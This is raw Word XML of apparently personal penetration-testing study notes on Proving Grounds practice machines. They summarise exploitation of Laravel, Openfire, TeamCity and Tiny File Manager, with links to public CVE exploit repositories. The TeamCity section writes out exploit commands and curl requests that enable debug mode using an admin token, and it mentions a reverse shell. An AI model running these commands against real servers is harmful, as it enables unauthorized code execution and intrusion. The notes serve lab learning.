        <w:t xml:space="preserve">The exploit actually gave a "list index out of range" python error since there were no project created, so we had to manually create a project in order to fix error</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A8A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A8B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A8C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="462"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Laravel 8.4.0 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">was exploited with the help of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lavita </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1350">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">LaVita</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice. Laravel 8.4.0 was only vulnerable to CVE-2021-3129 if it has debug mode on. But it didn't. According to the right up, we can check by going to "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/_ignition/execute-solution</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" and if it gives an error, than debug mode is not on. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A8D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="462"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But then there was another website called Lavita that allowed you to turn debug mode on. And so we did</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A8E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="462"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then we can use this exploit on Laravel to get rev shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A8F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="462"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1351">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/joshuavanderpoll/CVE-2021-3129/tree/main</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A90">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A91">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A92">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="489"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Openfire 4.7.3 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">was exploited in Fired PG Practice. I read two writeups, and both seemed to use the same strategy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A93">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="489"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The two writeups are </w:t>
      </w:r>
      <w:hyperlink r:id="rId1352">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and </w:t>
      </w:r>
      <w:hyperlink r:id="rId1353">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3A94">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="489"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They used two exploits: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A95">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="545"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The first one created new admin user and this is how we get past the authentication </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="545"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1354">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/K3ysTr0K3R/CVE-2023-32315-EXPLOIT\</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A97">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="545"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The second is authenticated RCE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A98">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="545"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can use this github (as seen in second writeup)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="545"/>
        </w:numPr>
        <w:ind w:left="3600" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1355">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/miko550/CVE-2023-32315</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A9A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="545"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or follow a blog post (as seen in first writeup)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A9B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="545"/>
        </w:numPr>
        <w:ind w:left="3600" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1356">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.vicarius.io/vsociety/posts/cve-2023-32315-path-traversal-in-openfire-leads-to-rce</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A9C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A9D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A9E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="229"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TeamCity </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">was exploited in </w:t>
      </w:r>
      <w:hyperlink r:id="rId1357">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Scrutiny</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice, The exploit they used had some errors that they fixed using 0xdf’s writeup for Runner HTB. This is because they had to turn on Debug mode using the admin creds that the exploit created. And then once they did that, they got RCE. And they also showed how to enumerate TeamCity</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003A9F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="229"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1358">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was the Runner HTB writeup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="229"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here was the github exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AA1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="229"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1359">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/Stuub/RCity-CVE-2024-27198</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="229"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 RCity.py -t http://teams.onlyrands.com/ - no-enum -c id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AA3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="229"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ran into errors</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="229"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Take that token from the "value" field, then export to the TOKEN environment variable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AA5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="229"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From the output, look for: export TOKEN="&lt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TOKEN HERE</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AA6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="229"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -X POST 'http://teams.onlyrands.com/admin/dataDir.html?action=edit&amp;fileName=config%2Finternal.properties&amp;content=rest.debug.processes.enable=true' -H "Authorization: Bearer $TOKEN"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="229"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then refresh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AA8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="229"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl 'http://teams.onlyrands.com/admin/admin.html?item=diagnostics&amp;tab=dataDir&amp;file=config/internal.properties' -H "Authorization: Bearer $TOKEN"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AA9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="229"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then run</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> python3 RCity.py -t http://teams.onlyrands.com/ -c id </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">again, now that debug mode is enabled.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AAA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="229"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I ran a perl reverse shell from pentestmonkey’s list and caught it on port 80.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AAB">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AAC">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="705"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tinyfilemanager</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Tiny File Manager) was exploited in the SPX PG practice</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003AAE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="705"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">There were two writeups. They both did it a little bit differently. You can try both methods. </w:t>
      </w:r>
      <w:hyperlink r:id="rId1360">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and </w:t>
      </w:r>
      <w:hyperlink r:id="rId1361">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3AAF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="705"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The first one also had a good idea of Googlging the config file name for SPX after finding LFI, and saw it was in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tinyfilemanager.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> which gave us creds.</w:t>
      </w:r>
    </w:p>
